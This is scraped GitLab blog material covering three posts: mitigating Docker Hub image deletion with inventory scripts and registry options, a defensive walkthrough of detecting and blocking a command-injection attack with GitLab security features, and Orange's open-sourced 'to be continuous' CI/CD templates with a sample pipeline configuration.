The code has been prepared to either check against a single project, a group with projects, or an instance (this may take very long, use with care).\n\nYou can perform a more history-focused analysis by fetching the CI/CD job logs from GitLab and search for the pulled container image to get an overview of past Docker executor runs – for example: `Using Docker executor with image python:3.11 ...`. The screenshot shows the CI/CD job logs UI search – you can automate the search using the GitLab API, and the [python-gitlab library](https://python-gitlab.readthedocs.io/en/stable/gl_objects/pipelines_and_jobs.html#jobs), for example.\n\n![GitLab CI/CD job logs, searching for the `image` keyword](https://about.gitlab.com/images/blogimages/docker-hub-oss-image-deletion-mitigation/cicd_gitlab_job_logs_search_image.png)\n\nThis snippet can be used in combination with the code shared for the CI lint API endpoint. It fetches the job trace logs, and searches for the `image` keyword in the log. The missing parts are splitting the log line by line, and extracting the image key information. This is left as an exercise for the reader.\n\n```python\n        for job in project.jobs.list():\n            log_trace = str(job.trace())\n\n            print(log_trace)\n\n            if 'image' in log_trace:\n                print(\"Job ID: {i}, URL {u}\".format(i=job.id, u=job.web_url))\n                print(log_trace)\n```\n\n### More inventory considerations\n\nSimilar to the API script for CI/CD navigating through all projects, you will need to analyze all Kubernetes manifest configuration files – using either a pull- or push-based approach. This can be achieved by using the [python-gitlab methods to load files from the repository](https://python-gitlab.readthedocs.io/en/stable/gl_objects/projects.html#project-files) and searching the content in similar ways. 
Helm charts use container images, too, and will require additional analysis.\n\nAn additional search possibility: Custom-built container images that use Docker Hub images as a source. A project will consist of:\n\n1. `Dockerfile` file that uses `FROM \u003Cimagename>`\n2. `.gitlab-ci.yml` configuration file that builds container images (using Docker-in-Docker, Kaniko, etc.)\n\nAn alternative search method for customers is available by using the [Advanced Search](https://docs.gitlab.com/ee/user/search/advanced_search.html) through the GitLab UI and API. The following example uses the [scope: blobs](https://docs.gitlab.com/ee/api/search.html#scope-blobs-premium-2) to search for the `FROM` string:\n\n```shell\n$ export GITLAB_TOKEN=xxxxxxxxx\n\n# Search in https://gitlab.com/gitlab-da/use-cases/docker/custom-container-image-python\n\n$ curl --header \"PRIVATE-TOKEN: $GITLAB_TOKEN\" \"https://gitlab.com/api/v4/projects/44352983/search?scope=blobs&search=FROM%20filename:Dockerfile*\"\n```\n\n![Command line output from Advanced Search API, scope blobs, search `FROM` in `Dockerfile*` file names.](https://about.gitlab.com/images/blogimages/docker-hub-oss-image-deletion-mitigation/cli_gitlab_advanced_search_api_dockerfile_from.png)\n\n## Mitigations and solutions\n\nThe following sections discuss potential mitigation strategies, and long-term solutions.\n\n### Mitigation: GitLab dependency proxy\n\nThe dependency proxy provides a caching mechanism for Docker Hub images. It helps reduce the bandwidth and time required to download and pull the images. It also helped to [mitigate the Docker Hub pull rate limits introduced in 2020](/blog/minor-breaking-change-dependency-proxy/). The dependency proxy can be configured for public and private projects.\n\nThe [dependency proxy](https://docs.gitlab.com/ee/user/packages/dependency_proxy/) needs to be enabled for a group. 
It also needs to be enabled by an instance administrator for self-managed environments, if turned off.\n\nThe following example creates two jobs: `image-docker-hub` and `image-docker-hub-dep-proxy`. The dependency proxy job uses the `CI_DEPENDENCY_PROXY_GROUP_IMAGE_PREFIX` CI/CD variable to instruct GitLab to store the image in the cache, and only pull it once when not available.\n\n```yaml\n.test-python-version:\n  script:\n    - echo \"Testing Python version:\"\n    - python --version\n\nimage-docker-hub:\n  extends: .test-python-version\n  image: python:3.11\n\nimage-docker-hub-dep-proxy:\n  extends: .test-python-version\n  image: ${CI_DEPENDENCY_PROXY_GROUP_IMAGE_PREFIX}/python:3.11\n```\n\nThe configuration is available in [this project](https://gitlab.com/gitlab-de/use-cases/docker/gitlab-dependency-proxy).\n\nThe stored container image is visible at the group level in the `Package and container registries > Dependency Proxy` menu.\n\n### Mitigation: Container registry mirror\n\n[This blog post](/blog/mitigating-the-impact-of-docker-hub-pull-requests-limits/) describes how to run a local container registry mirror. Skopeo from Red Hat is another alternative for syncing container image registries, a practical example is described [in this article](https://marcbrandner.com/blog/transporting-container-images-with-skopeo/).\n\nThe GitLab Cloud Native installation ([Helm charts](https://docs.gitlab.com/charts/) and [Operator](https://docs.gitlab.com/operator/)) use a [mirror of tagged images](https://gitlab.com/gitlab-org/cloud-native/mirror/images) consumed by the related projects. Other product stages follow a similar approach, the [security scanners are shipped in container images](https://docs.gitlab.com/ee/user/application_security/offline_deployments/#container-registries-and-package-repositories) maintained by GitLab. 
This also enables self-managed airgapped installations.\n\n### Mitigation: Custom images in GitLab container registry\n\nReproducible builds and compliance requirements may have required you to create custom container images for CI/CD and Kubernetes already. This is also key to verify that no untested and untrusted images are being used in production. GitLab provides a fully integrated [container registry](https://docs.gitlab.com/ee/user/packages/container_registry/), which can be used natively within CI/CD pipelines and [GitOps workflows with the agent for Kubernetes](https://docs.gitlab.com/ee/user/clusters/agent/gitops.html).\n\nThe following `Dockerfile` example extends an existing image layer, and installs additional tools using the Debian Apt package manager.\n\n```\nFROM python:3.11-bullseye\n\nENV DEBIAN_FRONTEND noninteractive\n\nRUN apt update && apt -y install git curl jq && rm -rf /var/lib/apt/lists/*\n```\n\nYou can [use Docker to build container images](https://docs.gitlab.com/ee/ci/docker/using_docker_build.html), and alternative options are Kaniko or Podman. On GitLab.com SaaS, you can use the Docker CI/CD template to build and push images. The following example modifies the `docker-build` job to only build the latest tag from the default branch:\n\n```yaml\ninclude:\n  - template: Docker.gitlab-ci.yml\n\ndocker-build:\n  stage: build\n  rules:\n    - if: '$CI_COMMIT_REF_NAME == $CI_DEFAULT_BRANCH || $CI_COMMIT_TAG'\n      #when: manual\n      #allow_failure: true\n```\n\nFor this example, we specifically want to provide a Git tag that gets used for the container image tag as well.\n\n```\n$ git tag 3-11-bullseye\n$ git push --tags\n```\n\nThe image will be available at the GitLab container registry URL and the project namespace path. This path needs to be replaced in all projects that use a Python-based image. 
You can [create scripts for the GitLab API](/blog/efficient-devsecops-workflows-hands-on-python-gitlab-api-automation/) to update files and create MRs automatically:\n\n```\nimage: registry.gitlab.com/gitlab-da/use-cases/docker/custom-container-image-python:3-11-bullseye\n```\n\n_Note: This is a demo project and not actively maintained. Please fork/copy it for your own needs._\n\n## Observability and security\n\nThe [number of failed CI/CD pipelines](https://docs.gitlab.com/ee/user/analytics/ci_cd_analytics.html) can be a good service level indicator (SLI) to verify whether the environment is affected by the Docker Hub changes. The same SLI applies for CI/CD jobs that build container images, using a `Dockerfile` file, which is based on Docker Hub images (FROM \u003Cimagename>).\n\nA similar SLI applies to Kubernetes cluster deployments – if they continue to generate failures in GitOps pull or CI/CD push scenarios, additional analysis and actions are required. The pod status `ErrImagePull` and [`ImagePullBackOff`](https://kubernetes.io/docs/concepts/containers/images/#imagepullbackoff) will immediately show the problems. 
The [image pull policy](https://kubernetes.io/docs/concepts/containers/images/#image-pull-policy) should also be revised – `Always` will immediately cause a problem, while `IfNotPresent` will use the local image cache.\n\n[This alert rule example](https://awesome-prometheus-alerts.grep.to/rules.html#rule-kubernetes-1-18) for Prometheus observing a Kubernetes cluster can help detect the pod state as not healthy.\n\n```yaml\n  - alert: KubernetesPodNotHealthy\n    expr: sum by (namespace, pod) (kube_pod_status_phase{phase=~\"Pending|Unknown|Failed\"}) > 0\n    for: 15m\n    labels:\n      severity: critical\n    annotations:\n      summary: Kubernetes Pod not healthy (instance {{ $labels.instance }})\n      description: \"Pod has been in a non-ready state for longer than 15 minutes.\\n  VALUE = {{ $value }}\\n  LABELS = {{ $labels }}\"\n```\n\nCI/CD pipeline linters and Git hooks can also be helpful to enforce using a GitLab registry URL prefix in all `image` tags, when new updates to CI/CD configurations are being pushed into merge requests.\n\nKubernetes deployment images can be controlled through additional integrations with the [Open Policy Agent Gatekeeper](https://www.openpolicyagent.org/docs/latest/kubernetes-introduction/) or [Kyverno](https://kyverno.io/policies/best-practices/restrict_image_registries/restrict_image_registries/). Kyverno also allows you to [mutate the image registry location](https://kyverno.io/policies/other/replace_image_registry/replace_image_registry/), and redirect the pod image to trusted sources.\n\n[Operational container scanning](https://docs.gitlab.com/ee/user/clusters/agent/vulnerabilities.html) in Kubernetes clusters and [container scanning in CI/CD pipelines](https://docs.gitlab.com/ee/user/application_security/container_scanning/) are recommended. 
This ensures that all images do not expose security vulnerabilities.\n\n## Long-term solutions\n\nAs a long-term solution, analyze the affected Docker Hub organizations' images and match them against your image usage inventory. Some organizations have raised their concerns in [this Docker Hub feedback issue](https://github.com/docker/hub-feedback/issues/2314). Be sure to identify critical production CI/CD workflows and replace all external dependencies with locally maintained images.\n\nFork/copy project Dockerfile files from the upstream Git repositories, and use them as the single source of truth for custom container builds. This will also require training and documentation for DevSecOps teams, for example optimizing container images for [efficient CI/CD pipelines](https://docs.gitlab.com/ee/ci/pipelines/pipeline_efficiency.html). More DevSecOps efficiency tips can be found in my Chemnitz Linux Days talk about \"Efficient DevSecOps Pipelines in a Cloud Native World\" ([slides](https://go.gitlab.com/RPog2h)).\n\n\u003Ciframe src=\"https://docs.google.com/presentation/d/e/2PACX-1vT3jcfpddKL2jq7leX01QX6S4Y8vfLLBZMz4L1ZHMLY3xzB4IGOOIExODLEzH8YQM1atCNPm07Bw9m_/embed?start=false&loop=true&delayms=3000\" frameborder=\"0\" width=\"960\" height=\"569\" allowfullscreen=\"true\" mozallowfullscreen=\"true\" webkitallowfullscreen=\"true\">\u003C/iframe>\n\nPlease share your ideas and thoughts about Docker Hub change mitigations and tools on the [GitLab community forum](https://forum.gitlab.com/). 
Thank you!\n\nCover image by [Roger Hoyles](https://unsplash.com/photos/sTOQyRD8m74) on [Unsplash](https://www.unsplash.com)\n{: .note}\n",[1036,1038,9],{"slug":2955,"featured":6,"template":689},"how-gitlab-can-help-mitigate-deletion-open-source-images-docker-hub","content:en-us:blog:how-gitlab-can-help-mitigate-deletion-open-source-images-docker-hub.yml","How Gitlab Can Help Mitigate Deletion Open Source Images Docker Hub","en-us/blog/how-gitlab-can-help-mitigate-deletion-open-source-images-docker-hub.yml","en-us/blog/how-gitlab-can-help-mitigate-deletion-open-source-images-docker-hub",{"_path":2961,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2962,"content":2967,"config":2973,"_id":2975,"_type":14,"title":2976,"_source":16,"_file":2977,"_stem":2978,"_extension":19},"/en-us/blog/how-gitlab-can-help-you-secure-your-cloud-native-applications",{"title":2963,"description":2964,"ogTitle":2963,"ogDescription":2964,"noIndex":6,"ogImage":1007,"ogUrl":2965,"ogSiteName":673,"ogType":674,"canonicalUrls":2965,"schema":2966},"How GitLab improves cloud native application security and protection","In this article, we will show you how GitLab can help you streamline your cloud native application security from a code and operations point of view by providing you with real-world examples.","https://about.gitlab.com/blog/how-gitlab-can-help-you-secure-your-cloud-native-applications","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"How GitLab improves cloud native application security and protection\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Nico Meisenzahl\"}],\n        \"datePublished\": \"2020-08-18\"\n      }",{"title":2963,"description":2964,"authors":2968,"heroImage":1007,"date":2970,"body":2971,"category":1119,"tags":2972},[2969],"Nico Meisenzahl","2020-08-18","\n{::options parse_block_html=\"true\" /}\n\nIn the [cloud-native](/topics/cloud-native/) ecosystem, decisions 
and changes are made on a rapid basis. Applications get adapted and deployed multiple times a week or even day. Microservices get developed decentralized with different people and teams involved. In such an environment, it is crucial to ensure that applications are developed and operated safely. This can be done by shifting security left into the developer lifecycle but also by using DevSecOps to empower operations with enhanced monitoring and protection for the application runtime.\n\nIn this article, I would like to show you how GitLab can help you streamline your application security from a code and operations point of view by providing you with real-world examples. Before we deep dive into the example, let me first introduce you to the [GitLab Secure](https://about.gitlab.com/stages-devops-lifecycle/secure/) and [GitLab Protect](https://about.gitlab.com/stages-devops-lifecycle/govern/) product portfolio which are the foundation for this. GitLab Secure helps developers to enable accurate, automated, and continuous assessment of their applications by proactively identifying vulnerabilities and weaknesses and therefore minimizing security risk. GitLab Protect, on the other hand, supports operations by proactively protecting environments and cloud-native applications by providing context-aware technologies to reduce overall security risk. Both are backed by leading open-source projects that have been fully integrated into developer and operation processes and the GitLab user interface (UI).\n\n## Cloud Native Application Security: The attack\n\nLet’s assume we have an application hosting a web interface that allows a user to provide some input. The application is written in [Golang](https://golang.org/) and executes the input as part of an external operating system command ([os/exec](https://golang.org/pkg/os/exec/)). 
The application does not contain any validation or security features to validate the input, which allows us to inject additional commands that are also executed in the application environment.\n\nThe application is running as containerized microservices in a Kubernetes cluster. The Kubernetes Cluster is shared across multiple teams and projects, allowing us to inject and read data in another application running next to ours. In our example, we will connect to an unsecured Redis instance in a different Namespace and read/write data.\n\nNow let us take a closer look at how GitLab can help us detect the attack, prevent its execution, and finally help us find and fix the root cause in our code.\n\n## Container Host Security\n\n[Container Host Security](/stages-devops-lifecycle/govern/) helps us to detect an attack in real-time by monitoring the pod for any unusual activity. It can then alert operations with detailed information on the attack itself.\n\nContainer Host Security is powered by [Falco](https://falco.org/), an open-source runtime security tool that listens to the Linux kernel using eBPF. Falco parses system calls and asserts the stream against a configurable rules engine in real-time. The Falco deployment used by Container Host Security can be deployed and fully managed using [GitLab Managed Apps](https://docs.gitlab.com/ee/update/removals.html).\n\nIn our example, Falco detects the injected redis-cli command, which is used to read/write data into the unsecured Redis instance. \n\n![Container Host Security](https://about.gitlab.com/images/blogimages/2020-08-18-How-GitLab-Can-Help-You-Secure-Your-Cloud-Native-Applications/falco.png)\n\nFalco can now alert operations who can use those valuable insights to define and execute further steps. \n\n## Container Network Security\n\nA first step to prevent access to the unsecured Redis instance would be to restrict traffic between the applications in our Kubernetes cluster. 
This can be done by using [Container Network Security](/stages-devops-lifecycle/govern/). Container Network Security is again fully managed by [GitLab Managed Apps](https://docs.gitlab.com/ee/update/removals.html) and can also be configured within the GitLab project user interface.\n\nContainer Network Security is powered by [Cilium](https://cilium.io/), an open-source networking plugin for Kubernetes that can be used to implement support for NetworkPolicy resources. [Network Policies](https://kubernetes.io/docs/concepts/services-networking/network-policies/) can be used to detect and block unauthorized network traffic between pods and to/from the Internet.\n\nImplementing Network Policies for our application will block the underlying network traffic generated by the attack. The policies can be enabled within the GitLab project UI:\n\n![Network Policies](https://about.gitlab.com/images/blogimages/2020-08-18-How-GitLab-Can-Help-You-Secure-Your-Cloud-Native-Applications/network-polices.png)\n\n## Web Application Firewall\n\nWith Container Network Security in place, our attack isn’t able to talk to the Redis instance anymore, but it is still possible to execute other network unrelated attacks using the command injection. [Web Application Firewall (WAF)](/stages-devops-lifecycle/govern/) can now help us to increase the security and detect and block the attack at the [Kubernetes Ingress](https://kubernetes.io/docs/concepts/services-networking/ingress/) level. \n\nThe Web Application firewall is also powered by open-source. It is based on the [ModSecurity](https://kubernetes.github.io/ingress-nginx/user-guide/third-party-addons/modsecurity/) module, a toolkit for real-time web application monitoring, logging, and access control. It is preconfigured to use the [OWASP’s Core Rule Set](https://www.modsecurity.org/CRS/Documentation/), which provides generic attack detection capabilities. 
Like the other integrations, Web Application Firewall is also fully managed by GitLab using [GitLab Managed Apps](https://docs.gitlab.com/ee/update/removals.html).\n\nIn our example, the Web Application Firewall detects the attack and is also able to block it:\n\n![Web Application Firewall logs](https://about.gitlab.com/images/blogimages/2020-08-18-How-GitLab-Can-Help-You-Secure-Your-Cloud-Native-Applications/waf-log.png)\n\nBlocking the attack at the Ingress level will help us to deny the traffic before it hits our application. To do so, we can enable the Web Application Firewall blocking mode directly from the GitLab UI:\n\n![WAF settings](https://about.gitlab.com/images/blogimages/2020-08-18-How-GitLab-Can-Help-You-Secure-Your-Cloud-Native-Applications/waf-settings.png)\n\nIn addition to Container Host Security, we could have used the Web Application Firewall to detect the attack using the Threat Monitoring dashboard within our GitLab project:\n\n![Threat Monitoring](https://about.gitlab.com/images/blogimages/2020-08-18-How-GitLab-Can-Help-You-Secure-Your-Cloud-Native-Applications/thread-monitoring.png)\n\nThe Threat Monitoring dashboard also provides us with useful insights and metrics of our enforced Container Network Policy.\n\n## Static Application Security Testing\n\nWe have now successfully protected our application runtime and ensured that no additional attacks can be executed. But we should also find and fix the root cause to ensure that such incidents are not recurring in the future. This is where [Static Application Security Testing (SAST)](/stages-devops-lifecycle/secure/) can help us. 
Static Application Security Testing can be easily integrated into our project using [GitLab CI/CD](https://docs.gitlab.com/ee/ci/) and then allows us to analyze our [source code](/solutions/source-code-management/) for known vulnerabilities.\n\nIn our case (a Golang application) the code scanning is executed using the open-source project [Golang Security Checker](https://github.com/securego/gosec). The results are displayed in the Security dashboard of our GitLab project for easy access:\n\n![Security Dashboard](https://about.gitlab.com/images/blogimages/2020-08-18-How-GitLab-Can-Help-You-Secure-Your-Cloud-Native-Applications/sec-dashboard.png)\n\nIn our example, the code scan has identified the root cause and provides us with detailed information about the vulnerability, the line of code that needs to be fixed, and the ability to easily create an issue to fix it.\n\n![SAST](https://about.gitlab.com/images/blogimages/2020-08-18-How-GitLab-Can-Help-You-Secure-Your-Cloud-Native-Applications/sast.png)\n\nFinally, of course, we should also talk to the team running the other application to make sure that their Redis instance gets secured too. We should also verify how the other [GitLab Secure](https://about.gitlab.com/stages-devops-lifecycle/secure/) features can help to further improve the overall security of the application.\n\n## GitLab Protect and Secure in action\n\nIf you like to get more insights on GitLab Secure and Protect and want to see it in action, you are welcome to join [Wayne](https://gitlab.com/whaber), [Philippe](https://gitlab.com/plafoucriere) and myself in our session [“Your Attackers Won't Be Happy! 
How GitLab Can Help You Secure Your Cloud-Native Applications!”](https://gitlabcommitvirtual2020.sched.com/event/dUWw/your-attackers-wont-be-happy-how-gitlab-can-help-you-secure-your-cloud-native-applications) at GitLab Commit where you can gain further insights on Container Host Security, Container Network Security, Web Application Firewall (WAF), and Static Application Security Testing (SAST).\n\nRegister today and join me and others at [GitLab Commit](https://about.gitlab.com/events/commit/) on August 26. GitLab Commit 2020 is a free 24-hour virtual experience filled with practical DevOps strategies shared by leaders in development, operations, and security.\n",[845,685,1038,9,865],{"slug":2974,"featured":6,"template":689},"how-gitlab-can-help-you-secure-your-cloud-native-applications","content:en-us:blog:how-gitlab-can-help-you-secure-your-cloud-native-applications.yml","How Gitlab Can Help You Secure Your Cloud Native Applications","en-us/blog/how-gitlab-can-help-you-secure-your-cloud-native-applications.yml","en-us/blog/how-gitlab-can-help-you-secure-your-cloud-native-applications",{"_path":2980,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2981,"content":2987,"config":2993,"_id":2995,"_type":14,"title":2996,"_source":16,"_file":2997,"_stem":2998,"_extension":19},"/en-us/blog/how-orange-uses-gitlab-ci-cd-for-modern-devops",{"title":2982,"description":2983,"ogTitle":2982,"ogDescription":2983,"noIndex":6,"ogImage":2984,"ogUrl":2985,"ogSiteName":673,"ogType":674,"canonicalUrls":2985,"schema":2986},"How Orange made a first step toward CI/CD standardization with GitLab","Find out how Orange made a first step toward CI/CD standardization with GitLab","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749682084/Blog/Hero%20Images/oranges.jpg","https://about.gitlab.com/blog/how-orange-uses-gitlab-ci-cd-for-modern-devops","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": 
\"How Orange made a first step toward CI/CD standardization with GitLab\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Pierre Smeyers\"}],\n        \"datePublished\": \"2021-07-29\"\n      }",{"title":2982,"description":2983,"authors":2988,"heroImage":2984,"date":2990,"body":2991,"category":10,"tags":2992},[2989],"Pierre Smeyers","2021-07-29","\n\nCI/CD is a foundational piece to modern software development. It's a major brick in the [DevOps](/topics/devops/) \"Automation\" pillar and every company involved in IT has to implement CI/CD or they're already quite far behind the curve.\n\nBut [implementing CI/CD](/topics/ci-cd/) can be challenging especially for growing or large companies. Some of those challenges include:\n\n* DevOps expertise and technical skills\n* [DevSecOps](/topics/devsecops/)\n* Standardization\n\n## Three key hurdles that come with implementing CI/CD\n\nThis blog post unpacks these challenges and explains how [Orange](https://orange.com/) overcame them using GitLab.\n\n### DevOps and technical skills\n\nNo matter which CI/CD tool you're using, it requires some amount of expertise to implement it right.\n\n**DevOps expertise** is important because your team needs some experience with Git workflows, deployment, environments, secrets management, etc. You can't ask a complete rookie to implement a state-of-the-art DevOps pipeline without expertise or experience.\n\n**Technical skills** are also important for implementing CI/CD. Any professional can tell you that getting started tutorials are insufficient. We inevitably need advanced functions, and that requires knowing the tool pretty well. 
GitLab CI/CD is constantly evolving, which creates an ongoing burden for projects that want to integrate new tooling as they go.\n\n### DevSecOps\n\nDevOps is all about finding the right balance between shortening the cycle and maximizing your confidence.\n\n[DevSecOps tools](/solutions/security-compliance/) are a keystone in maximizing our confidence because they detect issues with things like security, code quality, and compliance, etc., almost instantly. But DevSecOps tools are evolving quickly and today's Docker container scanner tools can be replaced by newcomers in just a few months.\n\nAlso, having each development team in the company choose and integrate various DevSecOps tools doesn't make sense and will be a waste of time and resources. Going this route means most developers won't use any DevSecOps tool because the opportunity cost isn't worth the time and effort.\n\n### Standardization\n\nThe last challenge in implementing CI/CD at a large company is the lack of standardization.\n\nGitLab CI/CD - as with most other CI/CD tools - is mainly a sophisticated scheduler, allowing a team to define technical tasks and their sequence. GitLab CI/CD cares little about the nature of these tasks, and does not give any clues as to the \"right\" way to build a DevOps pipeline. The consequence of this is that every company, project team, and developer will implement a DevOps pipeline their own way, in a manner that is probably significantly different from their colleagues'.\n\nAs a lifelong Javaist, I like to compare the current situation in CI/CD with what was the Java build in the pre-Maven era. Back then, we used non-structuring tools such as [Make](https://en.wikipedia.org/wiki/Make_(software)) or [Apache Ant](https://en.wikipedia.org/wiki/Apache_Ant). Each project created its own build system, adopted its own conventions, code, and resource files structure. In short, it was a happy mess with everyone reinventing the wheel. 
When joining another project, a user had to ask: \"How does the build work here?\".\n\nIn 2004, Maven was released (and Gradle three years later). For a while, there were heated debates between the proponents of standardization and the defenders of expertise and customization. Today it would not occur to anyone to build a Java project with anything other than Maven or Gradle. Now, if I join a project developed in Java, I will immediately know how files are organized and how the project is built. Java build is now standardized.\n\nI believe that CI/CD ought to go a similar route: tools should offer a more opinionated framework so that CI/CD too becomes a non-topic.\n\n## How a single GitLab feature changed the game for Orange\n\nAt Orange - probably like many other companies involved in IT - we struggled with the three challenges summarized above.\n\nThen in January 2019, the [`include`](https://docs.gitlab.com/ee/ci/yaml/#include) feature was released in the [Community Edition (version 11.7) of GitLab](/releases/2019/01/22/gitlab-11-7-released/):\n\n```yaml\ninclude:\n  - project: 'a-path/to-some-project'\n    file: '/very-smart-template.yml'\n```\n\nThis feature finally gave us the ability to develop and share state-of-the-art GitLab CI/CD pipeline templates!\n\nSo that's what we did.\n\nFor two years, a handful of DevOps/security/languages/cloud experts developed ready-to-use GitLab CI/CD pipeline templates. This personal initiative quickly became recognized as an internal project, attracting more users and contributors, bringing the community to 1000+ members as of June 2021, and leveraging about 30 available templates. 
The visible effect of this increasing adoption is the beginning of a **CI/CD standardization at Orange**.\n\nWe were so happy with our results and convinced that it's a general need that we open sourced our templates under the name [\"to be continuous\"](https://to-be-continuous.gitlab.io/doc/).\n\n![To be continuous logo](https://about.gitlab.com/images/blogimages/orange_tbc.jpg){: .shadow}\nThe \"to be continuous\" logo.\n{: .note.text-center}\n\n### What is in *to be continuous*?\n\nFor now, *to be continuous* has 26 templates of six kinds:\n\n* **Build & Test**: Angular, Bash, Go, Gradle, Maven, MkDocs, Node.js, PHP, Python\n* **Code Analysis**: Gitleaks, SonarQube\n* **Packaging**: Docker\n* **Infrastructure** (IaC): Terraform\n* **Deploy & Run**: Ansible, Cloud Foundry, Google Cloud, Helm, Kubernetes, OpenShift, S3 (Simple Storage Service)\n* **Acceptance**: Cypress, Postman, Puppeteer, Robot Framework, SSL test, k6\n* **Others**: semantic-release\n\n*To be continuous* is thoroughly documented:\n\n* [Basic notions and philosophy](https://to-be-continuous.gitlab.io/doc/understand/)\n* [General usage principles](https://to-be-continuous.gitlab.io/doc/usage/)\n* How to use *to be continuous* in a [self-managed instance of GitLab](https://to-be-continuous.gitlab.io/doc/self-managed/basic/)\n* Every template also has [its own documentation](https://to-be-continuous.gitlab.io/doc/ref/angular/)\n\nTo get started quickly, *to be continuous* provides an [interactive configurer](https://to-be-continuous.gitlab.io/kicker/) (aka *\"kicker\"*) that allows generating the `.gitlab-ci.yml` file simply by selecting the technical characteristics of your project.\n\nFinally, *to be continuous* exposes several [example projects](https://gitlab.com/to-be-continuous/samples), illustrating how to use the templates in production-like projects, combining multiple templates.\n\n### A quick glance at *to be continuous*\n\nThere are tons of resources to get started with *to be 
continuous*. But here is a quick example to get the taste of it.\n\nHere is the `.gitlab-ci.yml` file for a project:\n\n* Developed in Java 11 (built with Maven)\n* Code analysis with SonarQube\n* Packaged as a Docker image\n* Deployed to Kubernetes cluster\n* GUI tests with Cypress\n* API tests with Postman (Newman)\n\n```yaml\ninclude:\n  # Maven template\n  - project: \"to-be-continuous/maven\"\n    ref: \"1.4.2\"\n    file: \"templates/gitlab-ci-maven.yml\"\n  # Docker template\n  - project: \"to-be-continuous/docker\"\n    ref: \"1.2.0\"\n    file: \"templates/gitlab-ci-docker.yml\"\n  # Kubernetes template\n  - project: \"to-be-continuous/kubernetes\"\n    ref: \"1.2.0\"\n    file: \"templates/gitlab-ci-k8s.yml\"\n  # Cypress template\n  - project: \"to-be-continuous/cypress\"\n    ref: \"1.2.0\"\n    file: \"templates/gitlab-ci-cypress.yml\"\n  # Postman template\n  - project: \"to-be-continuous/postman\"\n    ref: \"1.2.0\"\n    file: \"templates/gitlab-ci-postman.yml\"\n\n# Global variables\nvariables:\n  # Explicitly define the Maven + JDK version\n  MAVEN_IMAGE: \"maven:3.8-openjdk-11\"\n\n  # Enables SonarQube analysis (on sonarcloud.io)\n  SONAR_URL: \"https://sonarcloud.io\"\n  # organization & projectKey defined in pom.xml\n  # SONAR_AUTH_TOKEN defined as a secret CI/CD variable\n\n  # Kubernetes\n  K8S_KUBECTL_IMAGE: \"bitnami/kubectl:1.17\" # client version matching my cluster\n  K8S_URL: \"https://k8s-api.my.domain\" # Kubernetes Cluster API url\n  # K8S_CA_CERT & K8S_TOKEN defined as secret CI/CD variables\n  # enable review, staging & prod\n  K8S_REVIEW_SPACE: \"non-prod\"\n  K8S_STAGING_SPACE: \"non-prod\"\n  K8S_PROD_SPACE: \"prod\"\n\n  # Cypress & Postman: enable test on review aps\n  REVIEW_ENABLED: \"true\"\n\n# Pipeline steps\nstages:\n  - build\n  - test\n  - package-build\n  - package-test\n  - review\n  - staging\n  - deploy\n  - acceptance\n  - publish\n  - production\n  ```\n\nThis fully declarative file produces the following 
**development pipeline** (any feature branch):\n\n![Screenshot of development pipeline](https://about.gitlab.com/images/blogimages/orange_development_pipeline.jpg){: .shadow}\n\n... and the following **production pipeline** (`master` or `main` depending on your preferences):\n\n![Screenshot of production pipeline](https://about.gitlab.com/images/blogimages/orange_production_pipeline.jpg){: .shadow}\n\nAlthough they look pretty much the same, they aren't:\n\n* While the production pipeline privileges sureness and completeness, development pipelines privilege short cycles and developer experience. While code analysis jobs and acceptance tests are blocked in production, they only generate a non-blocking warning in development in case of failure.\n* The production pipeline deploys to the staging environment before deploying to production (provided acceptance tests are green). Development pipelines may deploy to a dynamically generated review environment (optional).\n* Developers may prefer to use a single integration environment (associated with the develop branch) instead of one review app per feature branch. 
The default behavior of the integration pipeline is much closer to the production one.\n\nWhat you can't see:\n\n* Java unit tests are automatically executed, their report is [integrated to GitLab](https://docs.gitlab.com/ee/ci/unit_test_reports.html), with [code coverage](https://docs.gitlab.com/ee/ci/yaml/#coverage) too.\n* SonarQube integration automatically uses [branch analysis](https://docs.sonarqube.org/latest/branches/overview/) or [MR analysis](https://docs.sonarqube.org/latest/analysis/pull-request/) (with MR decoration) depending on the context.\n* Kubernetes environments are obviously [integrated to GitLab](https://docs.gitlab.com/ee/ci/environments/) too.\n* [Review apps](https://docs.gitlab.com/ee/ci/review_apps/index.html) can be cleaned-up manually or automatically on branch deletion.\n* Cypress and Postman tests reports are also [integrated to GitLab](https://docs.gitlab.com/ee/ci/unit_test_reports.html).\n* Docker uses the Kaniko build by default but it might be configured to use Docker-in-Docker instead. It uses the GitLab registry by default but can be configured to use any other registry.\n* Each template integrates the most appropriate DevSecOps tools: [kube-score](https://kube-score.com/) for Kubernetes, [hadolint](https://github.com/hadolint/hadolint) for Docker, [OWASP Dependency-Check](https://jeremylong.github.io/DependencyCheck/) for Maven, among others.\n* All those templates combine themselves gracefully. For example, Kubernetes may simply deploy the Docker image built upstream; Cypress and Postman tests automatically test the application deployed in the upstream jobs; Kubernetes could be replaced with OpenShift, GCP or any other supported hosting technology, it would behave the same.\n\n## Contribute to *to be continuous*\n\n[to be continuous](https://to-be-continuous.gitlab.io/doc) is out and eagerly waiting for users and contributors.\n\nHave a look and share your feedback. 
